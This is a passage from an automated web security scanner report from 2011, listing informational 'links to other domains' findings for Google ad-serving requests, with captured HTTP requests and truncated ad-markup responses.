53DImageAd%2526gl%253DUS%26usg%3DAFQjCNHAfPiCRQEaBygmPpceon8xemuSkQ&google_abg_img_url=http%3A//pagead2.googlesyndication.com/pagead/abglogo/abg-de-100c-000000.png&flash_element_id=google_flash_embed"><EMBED src="http://pagead2.googlesyndication.com/pagead/TemplateContainer.swf" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="google_xml_addata=%3CTEMPLATE_PARAMETERS%3E%3CNO_CONTAINER_XML/%3E%3CTEMPLATE_WIDTH%3E728%3C/TEMPLATE_WIDTH%3E%3CTEMPLATE_HEIGHT%3E90%3C/TEMPLATE_HEIGHT%3E%3CTEMPLATE_URL%3Ehttp%3A//pagead2.googlesyndication.com/pagead/gadgets/all_V15/all_V15_spec_728_90.swf%3C/TEMPLATE_URL%3E%3CTEMPLATE_AIT_URL%3Ehttp%3A//googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBBTlxmHO0TdnVJ4K7sQfb48DXDITUxoEC1Jva4h3AjbcBsL0QEAEYASC-zuUNOABQ6vPPUmDJ7oOI8KPsEqABk7my_wO6AQk3Mjh4OTBfYXPIAQTaAWpmaWxlOi8vL0M6L2Nkbi8yMDExLzA0LzI0L2RvcmsvcmVmbGVjdGVkLXhzcy1naGRiLWN3ZS03OS1jYXBlYy04Ni1zd2lzc2NvbW9ubGluZXNob3Auc3NvLmJsdWV3aW4uY2hfODAuaHRtgAIBqQKoYB6EUWi4PrgCGKgDAegDZugDEPUDAACAxA%26amp%3Bsigh%3D-95-68EmZkw%26amp%3Blabel%3D_AITNAME_%26amp%3Bvalue%3D_AITVALUE_%3C/TEMPLATE_AIT_URL%3E%3CTEMPLATE_ELEMENT+element_name%3D%22adData%22+index%3D%220%22%3E%3CTEMPLATE_FIELD+field_name%3D%22text1%22%3EBerufsunf%C3%A4higkeit%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1Font%22%3Earialblack%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1Color%22%3E0x000099%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2%22%3EAus+%C3%BCber+20+Testsieger!%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2Font%22%3Earial%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2Color%22%3E0x3333FF%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text3%22%3ESofort-Vergleich%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text3Font%22%3Earialblack%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text3Color%22%3E0x3333FF%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickText%22%3EHier+!%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTextFont%22%3Earialblack%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTextColor%22%3E0x000033%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22buttonColor%22%3E0x33CCFF%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22back1Color%22%3E0xFF9900%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22displayUrlColor%22%3E0x000000%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text3FontName%22%3E_arialblack%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text3FontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCO22nYnD1PWeAxD___________8BGP___________wEyCIe78m3bQUYj%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2FontName%22%3E_arial%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2FontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCO22nYnD1PWeAxD___________8BGP___________wEyCIe78m3bQUYj%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1FontName%22%3E_arialblack%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1FontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCO22nYnD1PWeAxD___________8BGP___________wEyCIe78m3bQUYj%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTextFontName%22%3E_arialblack%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTextFontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCO22nYnD1PWeAxD___________8BGP___________wEyCIe78m3bQUYj%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22displayUrl%22%3Ewww.finanzen-direkt.de%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22destinationUrl%22%3Ehttp%3A//www.finanzen-direkt.de/bu-vergleich-rabatt.html%3C/TEMPLATE_FIELD%3E%3C/TEMPLATE_ELEMENT%3E%3C/TEMPLATE_PARAMETERS%3E&google_width=728&google_height=90&destination_url=http%3A//www.finanzen-direkt.de/bu-vergleich-rabatt.html&display_url=www.finanzen-direkt.de&google_click_url=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBTlxmHO0TdnVJ4K7sQfb48DXDITUxoEC1Jva4h3AjbcBsL0QEAEYASC-zuUNOABQ6vPPUmDJ7oOI8KPsEqABk7my_wO6AQk3Mjh4OTBfYXPIAQTaAWpmaWxlOi8vL0M6L2Nkbi8yMDExLzA0LzI0L2RvcmsvcmVmbGVjdGVkLXhzcy1naGRiLWN3ZS03OS1jYXBlYy04Ni1zd2lzc2NvbW9ubGluZXNob3Auc3NvLmJsdWV3aW4uY2hfODAuaHRtgAIBqQKoYB6EUWi4PrgCGKgDAegDZugDEPUDAACAxA%26num%3D1%26sig%3DAGiWqtyqED591JqkxWJExPXkken1kAwV1A%26client%3Dca-pub-4063878933780912%26adurl%3D&google_ait_url=http%3A//googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBBTlxmHO0TdnVJ4K7sQfb48DXDITUxoEC1Jva4h3AjbcBsL0QEAEYASC-zuUNOABQ6vPPUmDJ7oOI8KPsEqABk7my_wO6AQk3Mjh4OTBfYXPIAQTaAWpmaWxlOi8vL0M6L2Nkbi8yMDExLzA0LzI0L2RvcmsvcmVmbGVjdGVkLXhzcy1naGRiLWN3ZS03OS1jYXBlYy04Ni1zd2lzc2NvbW9ubGluZXNob3Auc3NvLmJsdWV3aW4uY2hfODAuaHRtgAIBqQKoYB6EUWi4PrgCGKgDAegDZugDEPUDAACAxA%26sigh%3D-95-68EmZkw%26label%3D_AITNAME_%26value%3D_AITVALUE_&google_target_in_new_window=true&google_abg_url=http%3A//www.google.com/url%3Fct%3Dabg%26q%3Dhttps%3A//www.google.com/adsense/support/bin/request.py%253Fcontact%253Dabg_afc%2526url%253Dfile%3A///C%3A/cdn/2011/04/24/dork/reflected-xss-ghdb-cwe-79-capec-86-swisscomonlineshop.sso.bluewin.ch_80.htm%2526hl%253Dde%2526client%253Dca-pub-4063878933780912%2526adU%253Dwww.finanzen-direkt.de%2526adT%253DImageAd%2526gl%253DUS%26usg%3DAFQjCNHAfPiCRQEaBygmPpceon8xemuSkQ&google_abg_img_url=http%3A//pagead2.googlesyndication.com/pagead/abglogo/abg-de-100c-000000.png&flash_element_id=google_flash_embed" TYPE="application/x-shockwave-flash" AllowScriptAccess="always" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...

23.309. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680337&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662337830&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303662337832&frm=1&adk=2614322350&ga_vid=1537539124.1303662338&ga_sid=1303662338&ga_hid=1608480349&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=5 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:25:35 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14862

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Dwww.NetApp.com%26adT%3DNetApp%25C2%25AE%2BIT%2BCalculator%26adU%3Dwww.Microsoft.com/Cloud%26adT%3DWhat%2Bis%2BCloud%2BComputing%253F%26adU%3Dwww.quietpcusa.com%26adT%3DXRackPro2%2B25U%2BRackmount%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26gl%3DUS&amp;usg=AFQjCNH7pPwUF0R9tDBEnnzvX26qg_7yNg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.310. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679515&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661515754&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303661515758&frm=1&adk=2614322350&ga_vid=347363200.1303661516&ga_sid=1303661516&ga_hid=591762090&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=6 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:11:52 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14524

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DTourism%2B-%2BAmazonia%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3DECKOHousePublishing.com%26adT%3DSell%2BYour%2BBook%2Bon%2BAmazon%26adU%3DQuiBids.com/Auctions%26adT%3DKindle%25E2%2584%25A2%2BJust%2BSold,%2B%252442.13%26gl%3DUS&amp;usg=AFQjCNHq-qD1tCGDwWbtGLBLu9oVcPCQkw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.311. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303679569&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-dictofcom.html&dt=1303661681053&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303661681063&frm=0&adk=1607234649&ga_vid=972428568.1303661681&ga_sid=1303661681&ga_hid=897339887&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&fu=0&ifi=1&dtd=15&xpc=MNVo1MREuX&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:14:38 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12837

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-dictofcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.ErrorTeck.com%26adT%3DJava%2BScript%2BRepair%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26gl%3DUS&amp;usg=AFQjCNE7uZ9Tbxnoe2WC__28x-zPg8vuLw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110414/r20110415/measurements.js"></script>
...[SNIP]...

23.312. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676539&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658539274&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658539279&frm=1&adk=513358139&ga_vid=1473077194.1303658539&ga_sid=1303658539&ga_hid=2054928810&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:22:16 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 11998

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_728_90_b.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.thecaq.org%26adT%3DFinancial%2BReporting%26adU%3Dwww.coolcapitals.com%26adT%3DValencia%2BRestuarants%26adU%3Dwww.Credant.com/Healthcare%26adT%3DHipaa%2BCompliant%26gl%3DUS&amp;usg=AFQjCNHHr3_Ce4lPAKGjiNiqD1PZtJFYKQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.313. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681548&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663548258&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663548263&frm=1&adk=2614322350&ga_vid=1845614909.1303663548&ga_sid=1303663548&ga_hid=843104430&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:45:45 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2164

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919894&ahcid=1089763&bimpd=ruaS1-KEPhDZ7POOG22JCq5GjVhJ41pOTS5J7yUrVx-v55j_xVvDhCceBPiaSwlbta9a9_cLEBLJEnhT8lFYR69niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BCYYVaq6NvAn4T5JhFfjdzo9r9qSXhVfD-RlEq2Lb7tPlgHBzIj8H9loLjUdnhyPRc4RN-inI8pEqAxH2vizLBnrnjs0ppxGD7r18ENzxp2MffKaMqsZ1enCHl2qau2b7kvy-fr5_dAE21DMbixvFmdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPge7R7oyaDl40Wj8djiGyN4WptGk9EHnij-KmuGWgmGq44jHQGDLrsdmUV6C-zfBNFavce-0U6tnxWFnMP5mj9WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPetZOHC1kzE7ePsUwQvuAGkx5nm0lTjSklndxOrj4-IjIy9HCzfG1V190a4drUYjlO73wc-cQ7FRKnITKYzO3zYWecHLMh0arXQueGLxCVl7LoByWRKoQ3oF0AT_2N-Em_vTLcUD7lSWQB1A1_8OQ2ozt_T370WDWWY1SqEwEJwbhXPDssQGIF1ab8xpzk0MIKO0jwsuV5-UswDl8uj67vk8EevYjV2XrbhMMzMhcV-xwH5O2l4omHA8aqpEYcTYQNao408BxR9uazB8jKSDnLvk&acp=TbRTuQAFUOIK7FUK3DgJ_EtiWCk4WVsrPRXoOA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBtyhuuVO0TeKhFYqqsQf8k-DhDcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCUMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtyxTHP32A_KUUfHvWo7YraQhxKVRQ%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.314. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303665538&flash=0&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Fxss-hidden-field-clientid-style-attribute.sealcontrolcasecom.htm&dt=1303665569006&shv=r20110414&jsv=r20110415&saldr=1&correlator=1303665570045&frm=0&adk=1819763764&ga_vid=833411596.1303665571&ga_sid=1303665571&ga_hid=518854118&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=5&u_nmime=38&biw=1396&bih=1044&eid=33895130&fu=0&ifi=1&dtd=2085&xpc=CuaqRgjVue&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/24/dork/xss-hidden-field-clientid-style-attribute.sealcontrolcasecom.htm
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 17:26:32 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4448

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/xss-hidden-field-clientid-style-attribute.sealcontrolcasecom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.FullSail.edu%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHjLDnPe8bT0tTn72WNHqAMNQntPA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

